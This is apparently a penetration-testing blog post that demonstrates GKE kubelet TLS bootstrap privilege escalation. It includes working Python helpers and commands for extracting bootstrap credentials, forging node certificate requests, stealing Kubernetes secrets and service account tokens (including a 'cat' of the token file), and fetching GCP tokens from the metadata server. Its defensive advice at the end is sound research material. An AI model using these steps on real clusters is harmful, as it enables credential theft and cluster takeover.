Introduction to GKE Kubelet TLS Bootstrap Privilege Escalation

Kubernetes has become increasingly popular and is now the de facto standard for container orchestration. In recent Google Cloud Platform (GCP), Amazon Web Services (AWS), and Azure cloud pentests, we have seen many of our clients use Kubernetes to orchestrate containerized applications.



Recently, Microsoft released an attack matrix for Kubernetes based on the MITRE ATT&CK® framework. There is also excellent research from 4ARMED, “Hacking Kubelet on Google Kubernetes Engine”. In this blog, we will use a similar attack inspired by 4ARMED's research, along with other techniques highlighted in Microsoft's Kubernetes attack matrix. We will abuse Kubernetes kubelet TLS bootstrapping to gain cluster admin access in a GKE cluster. Below, you can see the Microsoft attack matrix with the portions we will touch on in this blog highlighted.

Microsoft Attack Matrix for Kubernetes

Kubernetes on GCP

GCP supports running managed Kubernetes with Google Kubernetes Engine (GKE). “GKE is an enterprise-grade platform for containerized applications, including stateful and stateless, AI and ML, Linux and Windows, complex and simple web apps, API, and backend services.”



Attack Scenario with Exploitation Route(s)

To demonstrate GKE kubelet TLS bootstrap privilege escalation, we will run through the simple attack scenario below, starting with compromised GCP credentials and ending with cluster admin access in the GKE cluster. The steps below are highlighted to correspond with the attack matrix.

Visualizing the Attack Route(s)

GKE Kubelet TLS Bootstrap Privilege Escalation Demonstration



To begin, we explore the GCP environment and discover that the compromised GCP credentials allow us to list Compute Engine VM instances. Using the “--log-http” flag, we save the HTTP request and response logs into a file named “http-logs.txt”.

The “--log-http” flag logs all HTTP server requests and responses to standard error (stderr), which we redirect to http-logs.txt.



Then, we inspect the “http-logs.txt” file and discover “kube-env” in the custom metadata of the Compute Engine VM instances. It contains kubelet TLS bootstrapping credentials encoded in base64.








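The lookup above can be sketched in Python, assuming the instance list was saved as JSON (for example with “gcloud compute instances list --format=json”) instead of being read out of http-logs.txt. A Compute Engine instance resource keeps its custom metadata under `metadata.items` as key/value pairs. The simple `KEY: value` line parser is an assumption about the layout of kube-env and will not handle multi-line YAML values. Both function names are hypothetical.

```python
from typing import Optional


def kube_env_from_instance(instance: dict) -> Optional[str]:
    """Return the raw 'kube-env' value from a Compute Engine instance resource."""
    for item in instance.get("metadata", {}).get("items", []):
        if item.get("key") == "kube-env":
            return item.get("value")
    return None


def parse_kube_env(text: str) -> dict:
    """Parse simple 'KEY: value' lines (assumed layout), dropping surrounding quotes."""
    env = {}
    for line in text.splitlines():
        # Split on the first colon only, so values such as URLs keep their colons
        key, sep, value = line.partition(":")
        if not sep or not key.strip():
            continue  # skip blank lines and lines without a key
        value = value.strip()
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "'\"":
            value = value[1:-1]
        env[key.strip()] = value
    return env


if __name__ == "__main__":
    sample = {"metadata": {"items": [{"key": "kube-env", "value": "CA_CERT: 'QUJD'\nKUBELET_KEY: REVG"}]}}
    print(sorted(parse_kube_env(kube_env_from_instance(sample))))
```

Working from structured JSON avoids scraping log text, at the cost of a second API call.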

Now, we can base64-decode CA_CERT, KUBELET_CERT and KUBELET_KEY and save them as files.


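The decoding step is a plain base64 decode per field. Here is a minimal sketch that assumes the fields were already parsed into a dictionary. The output file names (ca.crt, kubelet.crt, kubelet.key) are our own hypothetical choice.

```python
import base64
from pathlib import Path

# kube-env field -> output file name (file names are a hypothetical choice)
BOOTSTRAP_FIELDS = {
    "CA_CERT": "ca.crt",
    "KUBELET_CERT": "kubelet.crt",
    "KUBELET_KEY": "kubelet.key",
}


def decode_bootstrap(env: dict) -> dict:
    """Base64-decode the bootstrap fields, keyed by output file name."""
    return {name: base64.b64decode(env[field]) for field, name in BOOTSTRAP_FIELDS.items()}


def write_bootstrap(env: dict, out_dir: str = ".") -> None:
    """Write the decoded files; the private key is made readable by the owner only."""
    out = Path(out_dir)
    out.mkdir(parents=True, exist_ok=True)
    for name, data in decode_bootstrap(env).items():
        path = out / name
        path.write_bytes(data)
        if name.endswith(".key"):
            path.chmod(0o600)
```

The resulting files can be passed to kubectl with its standard “--certificate-authority”, “--client-certificate” and “--client-key” flags, together with “--server” pointing at the cluster endpoint.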

Next, we try to retrieve information about Kubernetes nodes using the kubelet TLS bootstrapping credentials. These credentials are limited to creating and retrieving certificate signing requests (CSRs), so it is common to see “No resources found” when trying to list CSRs.

The “kubectl auth can-i” subcommand helps determine whether the current subject can perform a given action.
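Under the hood, “kubectl auth can-i” creates a SelfSubjectAccessReview object (POST to /apis/authorization.k8s.io/v1/selfsubjectaccessreviews) and reads back `status.allowed`. The sketch below only builds that request body. The helper name `access_review` is hypothetical.

```python
import json


def access_review(verb: str, resource: str, group: str = "", namespace: str = "") -> dict:
    """Build a SelfSubjectAccessReview body, the object `kubectl auth can-i` submits."""
    attributes = {"verb": verb, "resource": resource, "group": group}
    if namespace:
        attributes["namespace"] = namespace  # omit for cluster-wide checks
    return {
        "apiVersion": "authorization.k8s.io/v1",
        "kind": "SelfSubjectAccessReview",
        "spec": {"resourceAttributes": attributes},
    }


if __name__ == "__main__":
    # Roughly the question asked by `kubectl auth can-i create certificatesigningrequests`
    print(json.dumps(access_review("create", "certificatesigningrequests", "certificates.k8s.io"), indent=2))
```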

Now, we can become a fake worker node in the cluster. Doing so will allow us to list nodes, services, and pods, but we won’t be able to get secrets.



We generate a CSR for a fake worker node named “hacknode” by using the “cfssl” tool.
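Kubernetes recognizes a kubelet by its certificate subject: CN “system:node:<nodeName>” in the organization “system:nodes”. The sketch below shows what a cfssl CSR configuration claiming that identity might look like. The ECDSA P-256 key choice and the helper name are assumptions, not necessarily what was used in the screenshots.

```python
import json


def node_csr_config(node_name: str) -> dict:
    """cfssl CSR config claiming the kubelet identity for `node_name`."""
    return {
        # Node identities use CN=system:node:<nodeName>, O=system:nodes
        "CN": f"system:node:{node_name}",
        "key": {"algo": "ecdsa", "size": 256},  # key type is an assumption
        "names": [{"O": "system:nodes"}],
    }


if __name__ == "__main__":
    print(json.dumps(node_csr_config("hacknode"), indent=2))
```

Saved as hacknode.json, the configuration can be fed to “cfssl genkey hacknode.json | cfssljson -bare hacknode”, which writes hacknode.csr and hacknode-key.pem. The same helper applies later with a real node name.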

Let's submit “hacknode.csr” to the control plane. The kube-controller-manager automatically approves the CSR.


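Submitting a CSR means creating a CertificateSigningRequest object whose `spec.request` holds the PEM request, base64-encoded again. This is a minimal sketch assuming the certificates.k8s.io/v1 API. Clusters older than Kubernetes 1.19 only serve v1beta1, where `signerName` is optional. The helper name is hypothetical.

```python
import base64


def kubelet_client_csr(name: str, csr_pem: bytes) -> dict:
    """CertificateSigningRequest for a kubelet client certificate (certificates.k8s.io/v1)."""
    return {
        "apiVersion": "certificates.k8s.io/v1",
        "kind": "CertificateSigningRequest",
        "metadata": {"name": name},
        "spec": {
            # The PEM-encoded PKCS#10 request, base64-encoded once more for the API
            "request": base64.b64encode(csr_pem).decode("ascii"),
            "signerName": "kubernetes.io/kube-apiserver-client-kubelet",
            "usages": ["digital signature", "key encipherment", "client auth"],
        },
    }
```

Serialized to JSON and passed to “kubectl create -f”, an object like this is what the controller manager approved automatically in the step above.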

After that, we retrieve the approved certificate and save it as “hacknode.crt”.
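Once a CSR is approved and signed, the certificate appears base64-encoded in `status.certificate`. This is equivalent to “kubectl get csr hacknode -o jsonpath='{.status.certificate}' | base64 -d”. Here is a sketch that works on the CSR object as JSON. The helper name is hypothetical.

```python
import base64
from typing import Optional


def issued_certificate(csr_obj: dict) -> Optional[bytes]:
    """Return the PEM certificate from an approved CSR object, or None if not issued yet."""
    status = csr_obj.get("status", {})
    approved = any(c.get("type") == "Approved" for c in status.get("conditions", []))
    cert_b64 = status.get("certificate")
    if not approved or not cert_b64:
        return None  # pending, denied, or approved but not yet signed
    return base64.b64decode(cert_b64)
```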

To retrieve secrets, we need to generate another CSR with a valid worker node name, because a node can only retrieve secrets that are currently required by Pods scheduled on it.


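The rule above comes from the Kubernetes Node authorizer, which grants a kubelet read access to a secret only when a pod bound to that node references it. The sketch below models that rule in simplified form. It ignores projected volumes, ephemeral containers and non-secret objects, and the function names are hypothetical.

```python
def secrets_referenced(pod: dict) -> set:
    """Secret names a pod references via volumes, env, envFrom or imagePullSecrets."""
    spec = pod.get("spec", {})
    names = {v["secret"]["secretName"] for v in spec.get("volumes", []) if "secret" in v}
    names |= {ref["name"] for ref in spec.get("imagePullSecrets", [])}
    for container in spec.get("containers", []) + spec.get("initContainers", []):
        for env in container.get("env", []):
            ref = env.get("valueFrom", {}).get("secretKeyRef")
            if ref:
                names.add(ref["name"])
        for source in container.get("envFrom", []):
            if "secretRef" in source:
                names.add(source["secretRef"]["name"])
    return names


def node_can_read_secret(pods: list, node: str, namespace: str, secret: str) -> bool:
    """Simplified Node authorizer rule: some pod bound to `node` must reference the secret."""
    return any(
        pod.get("spec", {}).get("nodeName") == node
        and pod.get("metadata", {}).get("namespace", "default") == namespace
        and secret in secrets_referenced(pod)
        for pod in pods
    )
```

This also explains the workflow that follows: to read a given secret, an attacker needs a certificate for a node that runs a pod referencing it.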

We list the worker nodes by using the “hacknode” credentials.



Then, we generate another CSR for a valid worker node named “gke-cluster-1-default-pool-ec722b52-wc38”.



Then, we submit “hacknode-gke-cluster-1-default-pool-ec722b52-wc38.csr” to the control plane and again kube-controller-manager automatically approves the CSR.



Then, we retrieve the approved certificate and save it as “hacknode-gke-cluster-1-default-pool-ec722b52-wc38.crt”.



After that, we inspect pods in order to get secret names.

Then, we get a secret name from the pod named “postgresql-1-deployer-dzrgj”.

Then, we attempt to get the secret “postgresql-1-deployer-sa-token-m5lpz”, but the request is denied because no pod using this secret is scheduled on this node.



Next, we inspect another pod, “frontend-69859f6796-24xbg”, and get a different secret name, “default-token-8hhjf”. This time the request succeeds. The secret “default-token-8hhjf” contains “ca.crt” and “token”, so it looks like a service account token. In other words, we can steal secrets on different nodes by inspecting pods, getting secret names, and retrieving the secrets with certificates generated for the corresponding worker nodes.


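Secret values come back base64-encoded in the `data` map. Legacy service account token secrets have the type “kubernetes.io/service-account-token” and carry “token” and “ca.crt” keys, which is what the output above suggests. Here is a small sketch with hypothetical helper names.

```python
import base64


def decode_secret(secret: dict) -> dict:
    """Base64-decode every value in a Secret's `data` map."""
    return {key: base64.b64decode(value) for key, value in secret.get("data", {}).items()}


def is_service_account_token(secret: dict) -> bool:
    """Legacy token Secrets have this type and carry 'token' and 'ca.crt' keys."""
    data = secret.get("data", {})
    return secret.get("type") == "kubernetes.io/service-account-token" and all(
        key in data for key in ("token", "ca.crt")
    )
```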

Next, we obtain new credentials for the node named “gke-cluster-1-default-pool-ec722b52-czw3”. With them, we get the secret named “postgresql-1-deployer-sa-token-m5lpz”, which appears to be a service account token for PostgreSQL.


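A secret-based service account token is a JWT whose `sub` claim has the form “system:serviceaccount:<namespace>:<name>”. Decoding its payload is a quick way to confirm which service account a stolen token belongs to. This sketch does not verify the signature and is meant for inspection only. The helper names and the sample account name in the test are hypothetical.

```python
import base64
import json


def jwt_claims(token: str) -> dict:
    """Decode a JWT payload WITHOUT verifying its signature (inspection only)."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)  # restore stripped base64url padding
    return json.loads(base64.urlsafe_b64decode(payload))


def service_account_of(claims: dict) -> tuple:
    """Split 'system:serviceaccount:<namespace>:<name>' into (namespace, name)."""
    prefix = "system:serviceaccount:"
    sub = claims.get("sub", "")
    if not sub.startswith(prefix):
        raise ValueError(f"not a service account subject: {sub!r}")
    namespace, _, name = sub[len(prefix):].partition(":")
    return namespace, name
```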

After that, we set an environment variable named “POSTGRESQL_TOKEN”.







Then, we use the “POSTGRESQL_TOKEN” to get all resources in the default namespace. This PostgreSQL service account token seems to have a wide range of privileges.

Finally, we inspect a role binding for PostgreSQL and discover that the service account has been bound to the “cluster-admin” role. From here, we can perform a variety of attacks, such as accessing cloud resources by stealing a service account token from a worker node instance’s metadata server, listing secrets and configs, creating privileged containers, backdooring containers, and more.
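From the defender's side, the same discovery can be turned into an audit. The sketch below scans binding objects, for example the items returned by “kubectl get clusterrolebindings,rolebindings -A -o json”, for service accounts bound to the cluster-admin ClusterRole. The function name is hypothetical.

```python
def cluster_admin_service_accounts(bindings: list) -> list:
    """List (binding, namespace, service account) triples granted the cluster-admin ClusterRole."""
    found = []
    for binding in bindings:
        role = binding.get("roleRef", {})
        if role.get("kind") != "ClusterRole" or role.get("name") != "cluster-admin":
            continue
        for subject in binding.get("subjects") or []:  # subjects may be absent or null
            if subject.get("kind") == "ServiceAccount":
                namespace = subject.get("namespace") or binding.get("metadata", {}).get("namespace", "")
                found.append((binding["metadata"]["name"], namespace, subject["name"]))
    return found
```

Any service account that appears in the result is a candidate for a narrower role under the principle of least privilege.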

One More Thing...



There is one more thing that I would LOVE to show. Now, we can exec into a container to steal a GCP service account token and then access GCP resources.





We exec into a pod named “frontend-69859f6796-dkxl9” and then query GCP service account information from the worker node instance’s metadata server.

After that, we check the GCP service account scopes and retrieve a GCP service account token. Now, we might be able to move from the GKE cluster to the GCP environment.
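The metadata server queries above use Google's documented endpoints under /computeMetadata/v1/instance/service-accounts/default/, and every request must carry the “Metadata-Flavor: Google” header. Here is a minimal sketch. It only works from a VM, or a pod on one, that can reach the metadata server, and with the GKE metadata server enabled pods see only a subset of these endpoints. The helper names are hypothetical.

```python
import urllib.request

# Documented Compute Engine metadata path for the instance's default service account
SA_BASE = "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/"


def metadata_request(item: str) -> urllib.request.Request:
    """Build a metadata server request; the Metadata-Flavor header is mandatory."""
    return urllib.request.Request(SA_BASE + item, headers={"Metadata-Flavor": "Google"})


def fetch(item: str, timeout: float = 2.0) -> str:
    """Fetch an item such as 'email', 'scopes' or 'token' (the latter returns JSON)."""
    with urllib.request.urlopen(metadata_request(item), timeout=timeout) as resp:
        return resp.read().decode()
```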

For extra information, we can use the command below to read (and steal) the Kubernetes service account token from inside a container.

```shell
cat /var/run/secrets/kubernetes.io/serviceaccount/token
```

Note: Kubernetes mounts a service account token at one of the following paths:

/run/secrets/kubernetes.io/serviceaccount/token

or

/var/run/secrets/kubernetes.io/serviceaccount/token
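The same check can be done programmatically by trying both mount paths in turn. Here is a small sketch. The `root` parameter is a hypothetical addition for testing outside a container.

```python
from pathlib import Path
from typing import Optional

# The two mount paths from the note, relative to the container's root
TOKEN_PATHS = (
    "var/run/secrets/kubernetes.io/serviceaccount/token",
    "run/secrets/kubernetes.io/serviceaccount/token",
)


def read_service_account_token(root: str = "/") -> Optional[str]:
    """Return the first mounted service account token found under `root`, if any."""
    for relative in TOKEN_PATHS:
        path = Path(root) / relative
        if path.is_file():
            return path.read_text().strip()
    return None
```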

Conclusion

Kubernetes has a wide range of attack vectors, and many common attacks are covered by the Kubernetes attack matrix. We explored the GKE kubelet TLS bootstrap privilege escalation attack. Starting with compromised GCP credentials, we stole TLS bootstrap credentials by listing Compute Engine instances, generated and submitted CSRs, acted as worker nodes, stole secrets, and gained cluster admin access in the GKE cluster.

For defensive purposes, ensure that the principle of least privilege is followed where possible: any given member should have only the permissions they require and use, and nothing more. Also, consider enabling the GKE metadata server, which improves security by replacing the Compute Engine VM instance metadata server for workloads running in the cluster.

Follow us on Twitter for more GCP releases, Kubernetes releases and blog posts: @RhinoSecurity, @itgel_ganbold.